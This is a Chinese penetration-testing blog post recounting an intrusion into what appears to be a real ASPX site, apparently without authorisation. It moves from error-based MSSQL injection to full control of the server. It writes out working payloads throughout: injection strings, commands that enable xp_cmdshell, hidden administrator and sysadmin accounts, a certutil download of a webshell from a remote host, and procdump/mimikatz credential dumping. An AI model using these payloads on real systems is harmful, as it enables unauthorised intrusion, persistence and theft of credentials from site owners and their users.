1. 首页
  2. 渗透测试

【Hello_C】一次费劲的注入到提权

一次偶然发现了一处注入,apsx注入,之前练得少,决定试一试看看,先sqlmap跑一波

【Hello_C】一次费劲的注入到提权 【Hello_C】一次费劲的注入到提权

500报错,可能跑不出来,于是试试手工,sqlmap被拦了,但是手工很顺利,可能是加了sqlmap的指纹了吧;

【Hello_C】一次费劲的注入到提权https://img.chabug.org/img/20181021194543.png

判断版本’ or @@version>0 —

【Hello_C】一次费劲的注入到提权

计算机名 ‘ or @@SERVERNAME>0 —

爆当前数据库名 ‘ or db_name()>0 —

 

网站没有找见后台,想着跑出来密码也没有登录地方,于是那些查找数据库、表名、字段名就直接略过,跑出来也登不进去。

先看看其他网站,于是先跑一下二级域名以及旁站,bing查询确实很棒,可以查出好多旁站,极力推荐;

发现三处旁站,一个php的、一个oa还有一个致远协同,没有可以利用的地方,还是先看看注入吧;

先看注入, 当前用户  ‘ or user_name()>0 —

【Hello_C】一次费劲的注入到提权

判断是否支持多句查询

’;declare @s int;--

 

【Hello_C】一次费劲的注入到提权

查看一下xp_cmdshell是否开启

【Hello_C】一次费劲的注入到提权

首先开启一下xp_cmdshell

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--

 

显示登录成功,则是命令执行成功,成功开启xp_cmdshell,然后可以执行命令了,但是执行命令没有回显,正常现象;

直接添加用户,显示执行成功,但是没有用户添加上,郁闷,之后才发现是火绒的问题。

';exec master..xp_cmdshell 'net user web$ [email protected]# /add';--

';exec master..xp_cmdshell 'net localgroup administrators web$ /add';--

执行cmd回显:

';create table temp(id int identity(1,1),a varchar(8000));--   创建一个表

';insert into temp exec master.dbo.xp_cmdshell 'whoami'; --   执行cmd指令并且插入到表中

' and (select substring((select a from temp for xml auto),1,8000))>0;-- 可以一次得到所有的结果

';drop table temp;--  删除表

 

【Hello_C】一次费劲的注入到提权 【Hello_C】一次费劲的注入到提权

目标显示开启了1433,3389,3306端口,于是可以添加sa用户然后远程连接,增加sa用户:

';exec master.dbo.sp_addlogin test,password;--

';exec master.dbo.sp_addsrvrolemember test,sysadmin;--

 

可以直接连接,方便好多,比刚才执行命令舒服了好多;

【Hello_C】一次费劲的注入到提权

完美,可以直接执行命令,美滋滋。CS或者Msf直接撸之,但是没有vps就很心疼啊,只能找个shell远程下载了。

 

 

 

发现旁站php的配置文件,然后还有phpmyadmin,这里有几个思路拿shell:

  • 直接远程下载到web路径;
  • 旁站phpmyadmin后台拿shell;
  • 旁站登录后台拿shell;

 

第一个:

直接下载,然后,或者直接下载wce或者procdump.exe直接读取管理员密码然后登录,美滋滋。

certutil.exe -urlcache -split -f http://xxx/uploads/conf1g.txt conf1g.php

move conf1g.php  E:\xxxxx\   失败

 

直接500报错,看来是有waf,难怪slamp一直跑不出来,直接换个过狗的吧

【Hello_C】一次费劲的注入到提权

【Hello_C】一次费劲的注入到提权

【Hello_C】一次费劲的注入到提权

 

第二个:

phpmyadmin后台登录几种建表方式没有成功,然后日志写shell也没有成功

【Hello_C】一次费劲的注入到提权

【Hello_C】一次费劲的注入到提权

第三种

php站进入后台拿shell,密码还没有解开,暂时无法登录拿shell

 

最近发布的冰蝎管理shell,免杀还是不错的,大马带小马,可以简单操作了

【Hello_C】一次费劲的注入到提权

抓hash

wce  失败

Procdump导出,使用mimikatz

mimikatz# sekurlsa::minidump lsass.dmp

mimikatz# sekurlsa::logonPasswords full

 

【Hello_C】一次费劲的注入到提权

成功拿到密码登录

【Hello_C】一次费劲的注入到提权

原创文章,作者:Y4er,未经授权禁止转载!如若转载,请联系作者:Y4er

联系我们

在线咨询:点击这里给我发消息

QR code